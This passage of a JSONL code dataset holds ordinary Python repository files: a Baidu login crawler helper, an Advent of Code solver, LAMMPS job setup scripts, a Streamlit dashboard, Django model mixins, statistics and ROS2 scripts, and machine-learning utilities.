self.login(retrytimes=retrytimes)\r\n time.sleep(3)\r\n cookies = self.d.get_cookies()\r\n return {'succ': True, 'cookies': cookies, 'driver': self.d}\r\n except Exception as e:\r\n logger.error(e, exc_info=1)\r\n if retrytimes == 5:\r\n return {'succ': False, 'msg': 'unknown error', 'desc': e}\r\n retrytimes += 1\r\n time.sleep(1)\r\n return self.login(retrytimes=retrytimes)\r\n\r\n def run_login(self):\r\n self.d = self.init_driver()\r\n res = self.login()\r\n\r\n if not res.get('succ'):\r\n # status = False if res.get('msg') == 'pd' else 5\r\n # params = [self.user_info.get('id'), self.acc, self.user_info.get('platform'), None, status]\r\n # if not post_res(*params):\r\n # logger.error('login failed, post failed, account: %s' % self.acc)\r\n logger.info('login failed, post success')\r\n self.d.quit()\r\n res['invalid_account'] = True\r\n return res\r\n","repo_name":"Zwbdoctor/save_code","sub_path":"platform_crawler/spiders/get_login_data/login_baidu_phone_helper.py","file_name":"login_baidu_phone_helper.py","file_ext":"py","file_size_in_byte":5515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"41891811168","text":"from itertools import permutations\r\n\r\ndef read_input():\r\n file = open(\"Data/day13.txt\", \"r\")\r\n guests = {}\r\n \r\n for line in file:\r\n line = line.strip(\".\\n\").split()\r\n guests[(line[0], line[-1])] = int(line[3])\r\n \r\n if line[2] == \"lose\":\r\n guests[(line[0], line[-1])] *= -1\r\n \r\n return guests\r\n\r\ndef get_guest_list(guests):\r\n guest_list = set()\r\n for item in guests.keys():\r\n guest_list.add(item[0])\r\n \r\n return guest_list\r\n\r\ndef include_me(guests, guest_list):\r\n for person in guest_list:\r\n guests[(\"Me\", person)] = 0\r\n guests[(person, \"Me\")] = 0\r\n \r\n guest_list.add(\"Me\")\r\n \r\n return guests, guest_list\r\n\r\ndef seating_arrangement(guests, guest_list):\r\n max_happiness = 0\r\n \r\n for order in permutations(guest_list):\r\n happiness = 0\r\n \r\n for i in range(len(order)):\r\n happiness += guests[(order[i], order[(i+1)%len(order)])]\r\n happiness += guests[(order[(i+1)%len(order)], order[i])]\r\n \r\n max_happiness = max(max_happiness, happiness)\r\n \r\n return max_happiness\r\n \r\nif __name__ == \"__main__\":\r\n guests = read_input()\r\n guest_list = get_guest_list(guests)\r\n print(f\"Part one: {seating_arrangement(guests, guest_list)}\")\r\n guests, guest_list = include_me(guests, guest_list)\r\n print(f\"Part two: {seating_arrangement(guests, guest_list)}\")\r\n ","repo_name":"HarrisonGreen/Advent-of-Code-2015","sub_path":"Scripts/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19459080712","text":"#!/usr/bin/python\n\n# Module for setting up and performing lammps simulations\n# - Modifies the input scripts\n# - Modifies and sets up runs on the computer cluster\n# \n# Notes:\n# - init.mod modification needs a template init00.mod \n#\n# Last modified: April 21 2015\n#\n\nimport re, os, zipfile, shutil, subprocess\n\n# Functions for modification of init.mod\n#\ndef mod_init(parameters, pathT):\n \"\"\" Include new parameter set in init.mod file. 
\"\"\"\n with open(pathT + 'init0.mod', 'r') as fp:\n with open(pathT + 'init.mod', 'w') as fpo:\n lines = fp.readlines()\n linesOUT = ['\\n', '\\n']\n # Substitute parameters in each line\n for line in lines:\n linesOUT = sub_input(fp, line, linesOUT, parameters)\n fpo.write(''.join(linesOUT))\n \n \ndef sub_input(fp, line, linesOUT, parameters):\n \"\"\" Substitute new parameter values into init.mod file. \"\"\"\n \t# Find parameters that are to be changed\n for key in parameters:\n match = re.search(key, line)\n if match:\n # Find if match is a parameter declaration \n\t\t\t# this prevents from substituting expressions \n mnd = match.end()\n matchv = re.search('equal', line[mnd:])\n\t\t\t# If a declaration -- substitute new value \n if matchv:\n line0 = line[:mnd]\n line = re.sub(\"[0-9.]|e-|e[0-9]|e+[0-9]|\\n\", ' ', line[mnd:])\n line = line0 + line + parameters[key] + '\\n'\n linesOUT.append(line)\n return linesOUT\t\t \n\ndef num_atoms(n, pathT):\n \"\"\" Change number of atoms to use in the simulation. \"\"\"\n with open(pathT + 'init00.mod', 'r') as fp:\n with open(pathT + 'init0.mod', 'w') as fpo: \n lines = fp.readlines()\n for line in lines:\n fpo.write('replicate\\t'+ (n + ' ')*3 if 'replicate' in line else line)\n\ndef make_main(files, newdir, ensemble, split):\n \"\"\" Create main directory for LAMMPS simulations of ensemble with type split. \"\"\"\n # Remove old (if exists) and create new zipfile of type ensebmble for given split choice\n if split == 'n': \n inname = 'in.' + 'elastic_' + ensemble\n zipname = ensemble+'.zip'\n files.append(inname)\n elif split == '3n':\n inname_x = 'in.' + 'elastic_' + ensemble +'_x'\n inname_y = 'in.' + 'elastic_' + ensemble +'_y'\n inname_yz = 'in.' + 'elastic_' + ensemble +'_yz'\n zipname = ensemble+'.zip'\n files.append(inname_x)\n files.append(inname_y)\n files.append(inname_yz)\n try:\n os.remove(zipname)\n except OSError:\n pass\n zf = zipfile.ZipFile(zipname, 'a') \n try:\n for file in files:\n zf.write(file)\n finally:\n zf.close()\n # Make main directory for current results set\n os.mkdir(newdir)\n # Copy zip file to the main directory \n shutil.copy(zipname,newdir) \n return zipname\n\ndef make_dirs(path, newdir, T, zipname, ensemble, split):\n \"\"\" Create a directory for simulation at temperature T and subdirs if split is 3n. \"\"\"\n # Create the T directory\n dirname = 'T_'+ T\n pathT = path + newdir + '/' + dirname + '/'\n os.mkdir(pathT)\n # Unzip the zip file with scripts in the T directory\n zippath = path + newdir + '/' + zipname\n zf = zipfile.ZipFile(zippath)\n zf.extractall(pathT)\n # Modify according to split - create 3 directories and mv appropriate in. files into them \n if split == '3n':\n subdir = ['x', 'y', 'yz']\n for sub in subdir:\n pathsub = pathT + sub + '/'\n os.mkdir(pathsub)\n fname = 'in.' + 'elastic_' + ensemble + '_' + sub\n shutil.move(pathT + fname, pathsub)\n\ndef lmp_sub(p, T, pathT, split, ensemble):\n \"\"\" Submit the cluster submission script. \"\"\"\n if split == 'n': \n # Name and submit job in T_ directory\n # Make files executable\n subprocess.call(['chmod -R 700 *'], shell=True, cwd=pathT)\n fname = 'in.' + 'elastic_' + ensemble \n jobname = 'jobT' + T \n sub_command = 'submit_lammps_parallel.pl' + ' ' + fname + ' ' + p + ' ' + jobname + ' ' + '| qsub'\n subprocess.call([sub_command], shell=True, cwd=pathT)\n elif split == '3n':\n # Copy all files from /.../Ti/ to each subdirectory\n # appropriate in. 
files are mv there in make_dirs\n # Name and submit the jobs in each subdirectory\n # Make files executable\n subdir = ['x', 'y', 'yz']\n for sub in subdir:\n pathsub = pathT + sub + '/'\n fname = 'in.' + 'elastic_' + ensemble + '_' + sub \n jobname = 'jobT' + T + '_' + sub \n sub_command = 'submit_lammps_parallel.pl' + ' ' + fname + ' ' + p + ' ' + jobname + ' ' + '| qsub'\n subprocess.call(['cp *.* '+ pathsub], shell=True, cwd=pathT)\n subprocess.call(['chmod -R 700 */'], shell=True, cwd=pathT)\n subprocess.call([sub_command], shell=True, cwd=pathsub)\n\n\n","repo_name":"atruszkowska/NiElastic_LAMMPS_PYTHON","sub_path":"runlmp.py","file_name":"runlmp.py","file_ext":"py","file_size_in_byte":5035,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"27601188853","text":"import streamlit as st\nimport pandas as pd\nimport plotly.express as px\n\n\nNAME_MAP = {\n 'rauwedouwe': 'Douwe',\n '1pat8ir5aqzhzvs7ygs1jp8ga': 'Marcel',\n 'basmerbel': 'Bas',\n '31hbrww3peprl3puzzaqqf6yfycy': 'Cas',\n 'carmenvs': 'Carmen',\n '11140450740': 'Bryan',\n 'hankmoody420': 'Han'\n}\ndef map_user_names(name):\n if name in NAME_MAP:\n return NAME_MAP[name]\n else:\n return name\n\n\nFEATURE_GRAPH_MAP = {\n 'duur' : {\n 'x': 'duration_min',\n 'title': 'Duur',\n 'range_x': [0, None],\n 'labels': {'duration_min': 'Lengte (min)'}\n },\n 'tempo' : {\n 'x': 'tempo',\n 'title': 'Tempo',\n 'labels': {'tempo': 'tempo (bpm)'}\n }, \n 'populariteit' : {\n 'x': 'popularity',\n 'title': 'Populariteit',\n 'range_x': [0, 100],\n 'labels': {'popularity': 'populariteit'}\n },\n 'dancability' : {\n 'x': 'dancability',\n 'title': 'Dancability',\n 'range_x': [0, 1],\n 'labels': {'dancability': 'dancability'}\n },\n 'energie' : {\n 'x': 'energy',\n 'title': 'Energie',\n 'range_x': [0, 1],\n 'labels': {'energy': 'energie'}\n },\n 'luidheid' : {\n 'x': 'loudness',\n 'title': 'Luidheid',\n 'labels': {'loudness': 'luidheid (dB)'}\n },\n 'instrumentaalheid' : {\n 'x': 'instrumentalness',\n 'title': 'Instrumentaalheid',\n 'range_x': [0, 1],\n 'labels': {'instrumentalness': 'instrumentaalheid'}\n },\n 'blijheid' : {\n 'x': 'valence',\n 'title': 'Blijheid',\n 'range_x': [0, 1],\n 'labels': {'valence': 'blijheid'}\n },\n 'live-heid' : {\n 'x': 'liveness',\n 'title': 'Live-heid',\n 'range_x': [0, 1],\n 'labels': {'liveness': 'live-heid'}\n }\n}\n\ndf = pd.read_csv('data/tracks.csv')\ndf['user'] = df['user'].map(map_user_names)\ndf['duration_min'] = df['duration'].apply(lambda x: x / 60)\ndf['artists'] = df['artists'].apply(lambda x: [a.strip() for a in x[1:-1].replace(\"'\", '').replace('\"', '').split(',')])\ndf['popularity'] = df['popularity'].astype(float)\n\nst.set_page_config(page_title='🎵 Playlist', layout='wide')\n\nst.title('🏄‍♂️ Unicornication 2022 🏄‍♀️')\n\n\nst.sidebar.image('unicorn.png')\nselected_user = st.sidebar.multiselect('Selecteer gebruiker', df['user'].unique(), default=df['user'].unique())\nselected_feature = st.sidebar.selectbox('Kies een eigenschap', sorted(list(FEATURE_GRAPH_MAP.keys())))\n\nfiltered_df = df[['user', 'name', 'artists', FEATURE_GRAPH_MAP[selected_feature]['x']]]\nfiltered_df = filtered_df[filtered_df['user'].isin(selected_user)]\n\n\nst.dataframe(filtered_df)\n\nfig = px.histogram(\n filtered_df, \n histnorm='percent', \n **FEATURE_GRAPH_MAP[selected_feature]\n)\nst.plotly_chart(fig, 
use_container_width=True)\n\n\n","repo_name":"CasvandenBogaard/spotify-dashboard","sub_path":"1_🎵_Playlist.py","file_name":"1_🎵_Playlist.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38982778009","text":"import re\nfrom datetime import datetime\nfrom django.utils.timezone import now\nfrom django.db.models.aggregates import Max\nfrom django.db.models.deletion import ProtectedError\nfrom django.db.models.functions.comparison import Coalesce\nfrom django_jalali.db import models as jmodels\nfrom django.core.validators import RegexValidator\nfrom django.db import models\nimport django.db.models.options as options\nfrom rest_framework.exceptions import ValidationError\n\nfrom helpers.functions import get_current_user, get_new_child_code\n\noptions.DEFAULT_NAMES = options.DEFAULT_NAMES + ('backward_financial_year', 'permission_basename')\n\n\nclass BaseManager(models.Manager):\n\n def hasAccess(self, method, permission_basename=None, use_financial_year=True, financial_year=None):\n user = get_current_user()\n\n if not user:\n return super().get_queryset()\n\n if hasattr(self.model, 'financial_year') and use_financial_year:\n queryset = self.inFinancialYear(financial_year)\n else:\n queryset = super().get_queryset()\n\n if not permission_basename:\n permission_basename = self.model._meta.permission_basename\n\n if not permission_basename:\n raise Exception(\"Please set permission_basename in {} Meta class or pass it to method\".format(self))\n\n method = method.upper()\n if method == 'POST':\n operation = \"create\"\n elif method == 'GET':\n operation = \"get\"\n elif method == 'PUT':\n operation = \"update\"\n elif method == 'DELETE':\n operation = \"delete\"\n else:\n operation = method\n\n if user.has_perm(\"{}.{}\".format(operation, permission_basename)):\n return queryset\n else:\n if user.has_perm(\"{}Own.{}\".format(operation, permission_basename)):\n return queryset.filter(created_by=user)\n\n return queryset.none()\n\n def inFinancialYear(self, financial_year=None):\n from helpers.functions import get_current_user\n qs = super().get_queryset()\n\n company = None\n if financial_year:\n company = financial_year.company\n else:\n user = get_current_user()\n\n if not user:\n return super().get_queryset()\n\n financial_year = user.active_financial_year\n if financial_year:\n company = financial_year.company\n\n qs = qs.filter(financial_year__company=company)\n\n if self.model._meta.backward_financial_year:\n return qs.filter(financial_year__id__lte=financial_year.id)\n else:\n return qs.filter(financial_year=financial_year.id)\n\n\nclass BaseModel(models.Model):\n created_by = models.ForeignKey('users.User', on_delete=models.PROTECT, null=True, related_name='+')\n created_at = jmodels.jDateTimeField(auto_now=True, null=True)\n updated_at = jmodels.jDateTimeField(auto_now_add=True, null=True)\n is_auto_created = models.BooleanField(default=False)\n\n class Meta:\n abstract = True\n permissions = ()\n default_permissions = ()\n ordering = ['-pk']\n backward_financial_year = False\n permission_basename = None\n get_latest_by = 'pk'\n\n objects = BaseManager()\n\n def save(self, *args, **kwargs) -> None:\n if not self.pk:\n self.created_by = get_current_user()\n else:\n if isinstance(self, LockableMixin) and not kwargs.pop('toggling_lock', False) and self.is_locked:\n raise ValidationError(\"ابتدا قفل را باز کنید\")\n\n super().save(*args, **kwargs)\n\n def delete(self, *args, **kwargs):\n 
try:\n result = super(BaseModel, self).delete(*args, **kwargs)\n except ProtectedError as e:\n obj = e.protected_objects[0]\n raise ValidationError({\n 'non_field_error': 'ابتدا داده های وابسته را حذف نمایید',\n 'related_id': obj.id,\n 'related_class': obj.__class__.__name__\n })\n\n return result\n\n def update(self, **kwargs) -> None:\n for key in kwargs.keys():\n setattr(self, key, kwargs[key])\n self.save()\n\n\nclass LocalIdMixin(models.Model):\n local_id = models.BigIntegerField(null=True, blank=True, default=None)\n\n @property\n def financial_year(self):\n raise NotImplementedError()\n\n class Meta:\n abstract = True\n\n def save(self, *args, **kwargs) -> None:\n if not self.pk:\n self.local_id = self.__class__.objects.inFinancialYear(self.financial_year).aggregate(\n local_id=Coalesce(Max('local_id'), 0)\n )['local_id'] + 1\n super().save(*args, **kwargs)\n\n\nclass TreeMixin(models.Model):\n\n @property\n def CODE_LENGTHS(self):\n raise NotImplementedError()\n\n explanation = models.CharField(max_length=255, blank=True, null=True)\n\n level = models.IntegerField()\n code = models.CharField(max_length=100)\n parent = models.ForeignKey('self', on_delete=models.CASCADE, related_name='children', blank=True, null=True)\n\n class Meta:\n abstract = True\n\n def get_new_child_code(self):\n last_child_code = None\n\n last_child = self.children.order_by('-code').first()\n if last_child:\n last_child_code = last_child.code\n\n return get_new_child_code(\n self.code,\n self.CODE_LENGTHS[self.level + 1],\n last_child_code\n )\n\n @classmethod\n def get_new_code(cls):\n code = cls.objects.inFinancialYear().filter(level=0).aggregate(\n last_code=Max('code')\n )['last_code']\n\n if code:\n code = int(code) + 1\n else:\n code = 0\n\n if code < 9:\n code += 10\n\n if code >= 99:\n from rest_framework import serializers\n raise serializers.ValidationError(\"تعداد عضو های این سطح پر شده است\")\n\n return str(code)\n\n\nclass DefinableManager(BaseManager):\n\n def definites(self, financial_year=None):\n return self.inFinancialYear(financial_year).filter(is_defined=True)\n\n def indefinites(self, financial_year=None):\n return self.inFinancialYear(financial_year).filter(is_defined=False)\n\n\nclass DefinableMixin(models.Model):\n is_defined = models.BooleanField(default=False)\n defined_by = models.ForeignKey('users.User', on_delete=models.PROTECT, blank=True, null=True, related_name='+')\n definition_date = models.DateTimeField(blank=True, null=True)\n\n objects = DefinableManager()\n\n class Meta:\n abstract = True\n\n def define(self, date=None):\n if not self.is_defined:\n self.is_defined = True\n self.defined_by = get_current_user()\n self.definition_date = date or now()\n self.save()\n\n def indefine(self):\n self.is_defined = False\n self.defined_by = None\n self.definition_date = None\n self.save()\n\n\nclass LockableMixin(models.Model):\n \"\"\"\n Lock will be checked in BaseModel save method\n \"\"\"\n is_locked = models.BooleanField(default=False)\n locked_by = models.ForeignKey('users.User', on_delete=models.PROTECT, blank=True, null=True, related_name='+')\n lock_date = models.DateTimeField(blank=True, null=True)\n\n class Meta:\n abstract = True\n\n def lock(self, date=None):\n if not self.is_locked:\n self.is_locked = True\n self.locked_by = get_current_user()\n self.lock_date = date or now()\n self.save(toggling_lock=True)\n\n def unlock(self):\n self.is_locked = False\n self.locked_by = None\n self.lock_date = None\n self.save(toggling_lock=True)\n\n\ndef DATE(**kwargs):\n return 
jmodels.jDateField(**kwargs)\n\n\ndef POSTAL_CODE(**kwargs):\n return models.CharField(\n **kwargs,\n max_length=10,\n validators=[RegexValidator(regex='^.{10}$', message='طول کد پستی باید 10 رقم باشد', code='nomatch')]\n )\n\n\ndef PHONE(**kwargs):\n return models.CharField(\n **kwargs,\n max_length=11,\n validators=[RegexValidator(regex='^.{11}$', message='طول شماره موبایل باید 11 رقم باشد', code='nomatch')]\n )\n\n\ndef EXPLANATION():\n return models.CharField(max_length=1000, blank=True, null=True, default=\"\")\n\n\ndef is_valid_melli_code(value):\n if not re.search(r'^\\d{10}$', value):\n is_valid = False\n else:\n check = int(value[9])\n s = sum([int(value[x]) * (10 - x) for x in range(9)]) % 11\n is_valid = (2 > s == check) or (s >= 2 and check + s == 11)\n\n if not is_valid:\n raise ValidationError(\"کد ملی وارد شده صحیح نیست\")\n\n\ndef MELLI_CODE(**kwargs):\n return models.CharField(\n **kwargs,\n max_length=10,\n validators=[is_valid_melli_code]\n )\n\n\ndef DECIMAL(**kwargs):\n return models.DecimalField(max_digits=24, decimal_places=6, default=kwargs.pop('default', 0), **kwargs)\n\n\ndef upload_to(instance, filename):\n app = instance._meta.app_label\n model = instance.__class__.__name__\n return \"{}/{}/{}-{}\".format(app, model, datetime.now().timestamp(), filename)\n\n\ndef manage_files(instance, data, file_fields):\n for file_field in file_fields:\n if data.get('delete_{}'.format(file_field), False):\n getattr(instance, file_field).delete()\n setattr(instance, file_field, None)\n","repo_name":"sorooshmorshedi/back","sub_path":"helpers/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42583762738","text":"from scipy.stats import fisher_exact\nimport sys\nimport json\nimport pandas as pd\nimport os\nimport rpy2.robjects as robjects\nfrom rpy2.robjects import r as R\nfrom rpy2.robjects.numpy2ri import numpy2rpy\nfrom rpy2.robjects.packages import importr\nfrom rpy2.robjects import FloatVector\nimport numpy as np\nimport csv\n\nbase = importr('base')\nepitools=importr('epitools')\n\nbrain_part=\"visp\"\ncluster_num=16\n\nregions=[\"A1C\",\"AMY\",\"CBC\",\"DFC\",\n \"HIP\",\"IPC\",\"ITC\",\"M1C\",\n \"MD\",\"MFC\",\"OFC\",\"S1C\",\n \"STC\",\"STR\",\"V1C\",\"VFC\"]\n\nwork_dir=os.path.join(brain_part,\"stage_region_wise\",\"stage_vs_adulthood\")\nall_jsons=os.listdir(work_dir)\n\njdict={}\nfor f in all_jsons:\n if f.endswith(\".json\"):\n fstr=f.split(\".\")[0]\n with open(os.path.join(work_dir,f),\"r\") as wr:\n jdict[fstr]=json.load(wr)\n\ncomparisons=[\"prenatal_adulthood\",\n \"early_childhood_adulthood\"]\n\ni=1\nfor cnum in range(0,cluster_num+1):\n region_d={}\n for r in regions:\n comp_d={}\n for comparison in comparisons:\n jd=\"proportion\"+\"_\"+r+\"_\"+comparison\n clus_details=jdict[jd][\"Cluster\"+str(cnum)]\n ce=np.array([clus_details[\"a\"],clus_details[\"b\"]])\n univ=np.array([clus_details[\"U\"],clus_details[\"U\"]])\n r_ce=numpy2rpy(ce)\n r_univ=numpy2rpy(univ)\n R.assign(\"ce\", r_ce)\n R.assign(\"univ\", r_univ)\n omat=FloatVector([clus_details[\"a\"],clus_details[\"b\"],clus_details[\"U\"],clus_details[\"U\"]])\n R('pmat <- prop.test(x=ce,n=univ,alternative=\"greater\",conf.level=0.95)$p.value')\n pval=float((str(R(\"pmat\")).split(\" \")[1]).strip(\"\\n\"))\n epiod=epitools.oddsratio(omat)\n odds=epiod[1][1]\n comp_d[comparison+\"_pval\"]=pval\n 
comp_d[comparison+\"_pval_adj\"]=float(pval)*float(2)*(float(cluster_num+1))\n            comp_d[comparison+\"_odds_ratio\"]=odds\n            region_d[r]=comp_d\n    \n    with open(os.path.join(work_dir,brain_part+\"_prop_summary\",brain_part+\"_proportion_cluster\"+str(cnum)+\".csv\"),\"w\") as wh:\n        writer=csv.writer(wh)\n        writer.writerow([\"Region\",comparisons[0]+\"_pval\",comparisons[0]+\"_pval_adj\",\n                         comparisons[0]+\"_odds_ratio\",\n                         comparisons[1]+\"_pval\",comparisons[1]+\"_pval_adj\",\n                         comparisons[1]+\"_odds_ratio\"])\n        rl=[]\n        for r in region_d:\n            rl.append([r,region_d[r][comparisons[0]+\"_pval\"],\n                       region_d[r][comparisons[0]+\"_pval_adj\"],\n                       region_d[r][comparisons[0]+\"_odds_ratio\"],\n                       region_d[r][comparisons[1]+\"_pval\"],\n                       region_d[r][comparisons[1]+\"_pval_adj\"],\n                       region_d[r][comparisons[1]+\"_odds_ratio\"]])\n        writer.writerows(rl)\n","repo_name":"asmariyaz23/single_cell_autism_study","sub_path":"region_proportion_summarize.py","file_name":"region_proportion_summarize.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4198111032","text":"import rclpy\nfrom rclpy.node import Node\nfrom std_msgs.msg import String\n\n\nclass SettingsPublisher(Node):\n\n    def __init__(self) -> None:\n        super().__init__('SettingsPublisher')\n        self.publisher_ = self.create_publisher(String, 'freqRange_settings', 10)\n\n    def publishSettings(self, settings):\n        msg = String()\n        msg.data = settings\n        self.publisher_.publish(msg)\n        self.get_logger().info(msg.data)\n\ndef main(args=None):\n    rclpy.init(args=args)\n    right = False\n    while not right:\n        print(\"////// Settings change //////\" )\n        start = int(input(\"Input starting frequency (min freq 62) (in GHz): \"))\n        stop = int(input(\"Input stopping frequency (max freq 69) (in GHz): \"))\n        if (start >= 62 and stop <= 69 and start < stop):\n            right = True\n    \n    start_stop = \"[\" + str(start) + \",\" + str(stop) + \"]\"\n    SettingsPub = SettingsPublisher()\n    SettingsPub.publishSettings(start_stop)\n\n    SettingsPub.destroy_node()\n    rclpy.shutdown()\n    return 0 \n\nif __name__ == '__main__':\n    main()","repo_name":"ValtteriJH/Windows-10-sensor-intergration-to-linux","sub_path":"settings_pub/settings_pub/freqRange_settings.py","file_name":"freqRange_settings.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36672269666","text":"import os\r\nimport torchvision\r\nfrom torchvision import datasets, transforms\r\n\r\ndef save_mnist_by_class(dataset, save_dir):\r\n    # Create the save directories, one per digit class\r\n    os.makedirs(save_dir, exist_ok=True)\r\n    digit_dirs = [save_dir+'/'+str(i) for i in range(10)]\r\n    for dir in digit_dirs:\r\n        os.makedirs(dir, exist_ok=True)\r\n\r\n    # Iterate over the dataset and save each image to its class directory\r\n    for i, (image, label) in enumerate(dataset):\r\n        digit = label\r\n        save_path = os.path.join(digit_dirs[digit], f\"mnist_image_{i}.png\")\r\n        torchvision.utils.save_image(image, save_path)\r\n\r\n# Load the MNIST dataset\r\ntransform = transforms.Compose([\r\n    transforms.ToTensor(),\r\n    transforms.Normalize((0.1307,), (0.3081,))\r\n])\r\nmnist_dataset = datasets.MNIST('data', train=True, download=True, transform=transform)\r\n\r\n# Save the MNIST dataset by class\r\nsave_mnist_by_class(mnist_dataset, 'mnist_by_class')","repo_name":"cheart10086/DL","sub_path":"class.py","file_name":"class.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"1710786302","text":"import os\nimport glob\nimport logging\nimport sys\nimport torch\nimport matplotlib.pyplot as plt\n\nfrom .file_io import *\n\n\ndef set_gpu_devices(devices):\n os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'\n os.environ['CUDA_VISIBLE_DEVICES'] = devices\n print(f'Setting GPU devices is done. '\n f'CUDA_VISIBLE_DEVICES: {os.environ[\"CUDA_VISIBLE_DEVICES\"]}, '\n f'device count: {torch.cuda.device_count()}')\n\n\ndef show_num_params(model):\n total_params = sum(p.numel() for p in model.parameters())\n trainable_params = sum(p.numel() for p in model.parameters() if p.requires_grad)\n print(f'Model total params: {total_params:,} - trainable params: {trainable_params:,}')\n\n\ndef files_with_suffix(directory, suffix, pure=False):\n \"\"\"\n retrieving all files with the given suffix from a folder\n :param suffix: -\n :param directory: -\n :param pure: if set to True, only filenames are returned (as opposed to absolute paths)\n \"\"\"\n files = [os.path.abspath(path) for path in glob.glob(os.path.join(directory, '**', f'*{suffix}'), recursive=True)]\n if pure:\n files = [os.path.split(file)[-1] for file in files]\n return files\n\n\ndef get_logger():\n root = logging.getLogger()\n root.setLevel(logging.INFO)\n handler = logging.StreamHandler(sys.stdout)\n fmt = \"[%(filename)s line %(lineno)d] %(message)s\" # also get the function name\n handler.setFormatter(logging.Formatter(fmt))\n root.addHandler(handler)\n return root\n\n\ndef waited_print(string):\n print(string)\n print('====== Waiting for input')\n input()\n\n\ndef parse_log_file(file, mode='general'):\n lines = read_file_to_list(file)\n lines = [line for line in lines if line.startswith('Epoch')] # remove initial lines\n\n acc_at1_list, acc_at1_avg_list = [], []\n acc_at5_list, acc_at5_avg_list = [], []\n loss_list, loss_avg_list = [], []\n\n if mode == 'epoch_select':\n lines_to_consider = []\n for epoch in range(200):\n epoch_lines = [line for line in lines if line.startswith(f'Epoch: [{epoch}]')]\n # print(f'Epoch {epoch} lines: {len(epoch_lines)}')\n if len(epoch_lines) > 0: # if there are any lines in the log file with that epoch\n lines_to_consider.append(epoch_lines[-1]) # last line for each epoch before saving checkpoint\n else:\n lines_to_consider = lines # general mode, consider all lines\n\n # waited_print('')\n\n for line in lines_to_consider:\n the_list = line.split('\\t')\n loss_part = the_list[3]\n loss, loss_avg = float(loss_part.split(' ')[1]), float(loss_part.split(' ')[2][1:-1])\n\n acc_at1_part = the_list[4]\n acc_at5_part = the_list[5]\n\n acc_at_1, acc_at1_avg = float(acc_at1_part[6:12].strip()), float(acc_at1_part[14:20].strip())\n acc_at_5, acc_at5_avg = float(acc_at5_part[6:12].strip()), float(acc_at5_part[14:20].strip())\n\n loss_list.append(loss)\n loss_avg_list.append(loss_avg)\n\n acc_at1_list.append(acc_at_1)\n acc_at1_avg_list.append(acc_at1_avg)\n acc_at5_list.append(acc_at_5)\n acc_at5_avg_list.append(acc_at5_avg)\n\n return {\n 'acc_at1_list': acc_at1_list,\n 'acc_at1_avg_list': acc_at1_avg_list,\n 'acc_at5_list': acc_at5_list,\n 'acc_at5_avg_list': acc_at5_avg_list,\n 'loss_list': loss_list,\n 'loss_avg_list': loss_avg_list\n }\n\n\ndef visualize_log_file(file, metrics, title, parse_mode, vis_mode):\n dicts = parse_log_file(file, parse_mode)\n\n if vis_mode == 'do_prints':\n acc_at1_avg_list = dicts['acc_at1_avg_list']\n max_acc_at_1_avg = max(acc_at1_avg_list)\n inds = [i for i, j in enumerate(acc_at1_avg_list) if j == max_acc_at_1_avg]\n print(f'max_acc_at_1_avg: 
{max_acc_at_1_avg}, inds: {inds}')\n\n else:\n plt.title(title)\n if 'loss' in metrics:\n plt.plot(dicts['loss_list'], label='loss')\n plt.plot(dicts['loss_avg_list'], label='loss_avg')\n\n if 'acc_at1' in metrics:\n plt.plot(dicts['acc_at1_list'], label='acc_at1')\n plt.plot(dicts['acc_at1_avg_list'], label='acc_at1_avg')\n\n if 'acc_at5' in metrics:\n plt.plot(dicts['acc_at5_list'], label='acc_at5')\n plt.plot(dicts['acc_at5_avg_list'], label='acc_at5_avg')\n\n plt.legend()\n plt.grid()\n plt.show()\n\n\n","repo_name":"MoeinSorkhei/MoCo","sub_path":"helper/generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":4381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32749066062","text":"\"\"\"\npython3.6\n@author:ya-jin-wu\n@license: Apache Licence \n@file: permutations.py \n@time: 2020/07/26\n@contact: yajinwu@163.com\n@software: PyCharm \n\n「『「『「☃」』」』」 \n\"\"\"\nfrom typing import List\n\n'''\n全排列\n递归解法\n'''\n\nclass Solution:\n def permute(self, nums: List[int]) -> List[List[int]]:\n if len(nums) <= 1: # 递归终止条件\n return [nums]\n res = []\n for idx, num in enumerate(nums):\n res_nums = nums[:idx] + nums[idx + 1:] # 确定剩余元素\n for j in self.permute(res_nums):\n res.append([num] + j)\n return res\n\nif __name__ == '__main__':\n solution = Solution()\n nums = [1, 2, 3]\n result = solution.permute(nums)\n print(result)\n","repo_name":"yajinwuzl/algorithm","sub_path":"Algorithm_DataStructure/algorithm012/Week_03/permutations.py","file_name":"permutations.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"23963684776","text":"import numpy as np\nimport pandas as pd\nfrom sklearn import metrics\nfrom sklearn.model_selection import train_test_split\nimport lightgbm as lgb\nimport shap\n\nclass SHAP_Calculation:\n\n def __init__(self, X, y, id_column=None, id_value=None):\n self.X = X\n self.y = y\n # Enter unique_key column if exists\n self.id_column = id_column\n self.id_value = id_value\n self.model_list = list()\n\n def training_model(self, cv_cnt, params, test_size=0.3, num_boost_round=10000, early_stopping_rounds=50):\n print(\"Model training\")\n self.cv_cnt = cv_cnt\n self.params = params\n # Creating models in Bootstrapping-cross-validation manner\n for loop_cnt in range(cv_cnt):\n # Splitting data into test/train randomly and repetitively\n X_train, X_test, y_train, y_test = 